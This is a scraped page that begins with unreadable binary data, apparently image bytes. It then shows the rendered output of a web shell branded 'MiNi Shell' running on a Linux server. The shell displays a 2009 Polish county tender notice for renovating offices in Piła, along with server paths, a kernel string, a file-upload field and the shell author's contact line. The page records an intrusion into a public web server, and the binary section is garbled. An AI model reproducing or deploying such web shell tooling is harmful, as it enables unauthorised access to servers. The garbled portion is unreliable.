JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090128/29661-N-2009.html

<p class="kh_header"><b>Piła: PRZYSTOSOWANIE POMIESZCZEŃ NA PARTERZE BUDYNKU PRZY AL. NIEPODLEGŁOŚCI 33 NA POTRZEBY POWIATOWEGO OŚRODKA DOKUMENTACJI GEODEZYJNEJ I KARTOGRAFICZNEJ W PILE</b><br>
<b>Numer ogłoszenia: 29661 - 2009; data zamieszczenia: 28.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pilski reprezentowany przez Zarząd Powiatu w Pile , al. Niepodległości 33/35, 64-920 Piła, woj. wielkopolskie, tel. 067 2109330, 2109337, faks 067 2109332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZYSTOSOWANIE POMIESZCZEŃ NA PARTERZE BUDYNKU PRZY AL. NIEPODLEGŁOŚCI 33 NA POTRZEBY POWIATOWEGO OŚRODKA DOKUMENTACJI GEODEZYJNEJ I KARTOGRAFICZNEJ W PILE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
1. Zakres robót budowlanych objętych zamówieniem:
Zakresem robót objętych jest 20 pomieszczeń biurowych oraz dwa ciągi komunikacyjne na parterze budynku przy al. Niepodległości 33 w następującym zakresie:
- wymiana posadzek,
- wyburzenie ściany działowej w celu stworzenia pomieszczenia na archiwum,
- zamurowanie otworów drzwiowych, wykonanie nowych otworów i osadzenie drzwi,
- wymiana skrzydeł drzwiowych na wzmocnione i antywłamaniowe,
- wykonanie nowej instalacji elektrycznej
- wykonanie instalacji alarmowej, przeciwpożarowej i sieci komputerowej,
- wykonanie klimatyzacji dla pomieszczeń archiwalnych i serwerowi,
- montaż regałów przesuwnych w archiwum,
- wykonanie gładzi gipsowej na ścianach oraz malowanie pomieszczeń i ciągów komunikacyjnych.
2. Szczegółowy opis przedmiotu zamówienia zawarty jest w projektach, przedmiarach robót i Specyfikacjach Wykonania i Odbioru Robót Budowlanych.
3. Ponieważ roboty budowlane będą wykonywane w funkcjonującym budynku biurowym, Zamawiający ma następujące wymagania:
- prawe skrzydło budynku (patrząc od wejścia głównego), gdzie będzie wykonywana większość robót należy szczelnie oddzielić od holu wejściowego tak aby uchronić pozostałą część budynku od zanieczyszczeń związanych z prowadzonymi robotami. Zamawiający udostępni wejście boczne do budynku,
- roboty związane z dużym hałasem (burzenie ścian, wykuwanie otworów itp.) należy  wykonać po godzinach pracy Starostwa, tj. po godz. 1530.
- roboty remontowe związane z prawym skrzydłem budynku, którego nie można odizolować należy wykonywać w sposób jak najmniej uciążliwy dla pracowników i interesantów,
- gruz i odpadki muszą być wywożone na bieżąco,
- Zamawiający wymaga stałego nadzoru prowadzonych robót tzn. że  kierownik robót w czasie trwania prac musi być cały czas obecny na budowie.
4. Instalacje komputerowa, alarmowa i przeciwpożarowa muszą być wykonane przez firmy, które mają uprawnienia do wykonywania takich instalacji.
5. Okres gwarancji jakości za wykonane roboty- nie krótszy niż 36 miesięcy, a na wbudowana stolarkę okienną i drzwiową 60 miesięcy.
6. Warunki zapłaty
6.1. Wykonawca będzie wystawiał faktury VAT za części robót wynikające z harmonogramu robót i płatności załączonego do oferty.
6.2. Termin zapłaty faktur - 14 dni od doręczenia faktury Zamawiającemu.
6.3. Wartość ostatniej faktury nie może być mniejsza niż 20% ceny oferty.
6.4. Zapłata należności za ostatnią fakturę będzie uwarunkowana:   
a) bezusterkowym odbiorem końcowym robót.
b) rozliczeniem się Wykonawcy z podwykonawcami.
7. Harmonogram robót i płatności
Wykonawca jest zobowiązany sporządzić harmonogram robót i płatności. 
W harmonogramie płatności należy uwzględnić zapisy pkt. 6.
Uwaga! Harmonogram należy sporządzić w taki sposób, aby faktury częściowe obejmowały etapy robót, które mogą być objęte odbiorem częściowym, np. roboty elektryczne, wykonanie podłóg, itp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.00.00-3, 45.42.10.00-4, 45.31.43.20-0, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: 15 000 złotych (słownie: piętnaście tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 upzp.
2. Posiadają niezbędną wiedzę i doświadczenie i udokumentują, że w ciągu ostatnich 5 lat jako wykonawca budowlany wykonali roboty związane z budową, przebudową, rozbudową lub modernizacją co najmniej jednego obiektu użyteczności publicznej o wartości nie mniejszej niż 600 000 złotych.
3. Zobowiążą się do zatrudnienia kadry kierowniczej budowy, w tym: kierownika robót i kierownika robót elektrycznych z uprawnieniami.
4. Znajdują się w sytuacji ekonomicznej gwarantującej wykonanie zamówienia i w tym względzie udokumentują, że posiadają środki obrotowe lub zdolność kredytową w na kwotę nie mniejszą niż 50%  ceny brutto złożonej oferty.
5. Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
6.  Wskażą w ofercie części zamówienia, których wykonanie powierzą podwykonawcom.
Jeśli Wykonawca zamierza podzlecić roboty podwykonawcy/om to jest zobowiązany podać w ofercie nazwy podzlecanych robót i ich wartość.
W przypadku zatrudnienia podwykonawcy/ów zapłata ostatniej faktury za roboty uzależniona będzie od udokumentowania rozliczenia się Wykonawcy z podwykonawcą (solidarna odpowiedzialność za wynagrodzenie podwykonawcy inwestora i wykonawcy).
Wymienione wyżej warunki zostaną uznane przez Zamawiającego za spełnione, jeżeli złożone przez Wykonawcę, wymagane dokumenty, o których mowa w punkcie 7 SIWZ, potwierdzą ich spełnianie.
Ocena spełniania poszczególnych warunków odbędzie się na zasadzie spełnia, nie spełnia. Nie spełnienie choćby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty składające się na ofertę:
Dokumenty wymagane dla potwierdzenia warunków, jakie muszą spełniać Wykonawcy.
1. Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy Pzp, na formularzu stanowiącym załącznik nr 2 do SIWZ.
2.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert.
4. Oświadczenie Wykonawcy, że reprezentowana przez Niego firma nie jest w stanie upadłości, ani nie otwarto jej likwidacji.
5. Informację o doświadczeniu Wykonawcy - wykaz wykonanych w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót na obiektach użyteczności publicznej - załącznik Nr 3 do SIWZ.
Do informacji należy załączyć dokumenty potwierdzające, że wymienione roboty zostały wykonane należycie. Dokumenty te powinny być wystawione przez inwestora (zamawiającego). Roboty w wykazie nie potwierdzone w/w dokumentami nie będą brane pod uwagę przez Zamawiającego.
6. Informacje o kwalifikacjach i doświadczeniach podstawowego personelu kierowniczego i technicznego proponowanego do zatrudnienia na budowie w realizacji robót  załącznik Nr 4 do SIWZ. Do informacji załączyć kserokopie uprawnień budowlanych i aktualnych zaświadczeń potwierdzających  przynależność do Krajowej Izby Inżynierów budownictwa lub właściwej izby samorządu zawodowego architektów, inżynierów budownictwa oraz urbanistów, zgodnie z art. 6 ustawy z dnia 15 grudnia 2000 r. o samorządzie zawodowym architektów, inżynierów budownictwa i urbanistów (Dz. U. z 2001r. Nr 5, poz. 42). 
7. Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
8. Polisa lub inny dokument ubezpieczenia.
9. Informacja o zatrudnieniu podwykonawców robót - na formularzu zgodnym z treścią załącznika Nr 6 do SIWZ. 
Pozostałe dokumenty:
10. Formularz oferta - załącznik nr 1 do SIWZ.
11. Harmonogram robót i płatności.
12. Kosztorys ofertowy.
13. Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.pila.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pile
Al. Niepodległości 37
64-920 Piła
pokój 304.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 08:30, miejsce: Starostwo Powiatowe w Pile
Al. Niepodległości 33/35
64-920 Piła
w sekretariacie, pokój 111.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com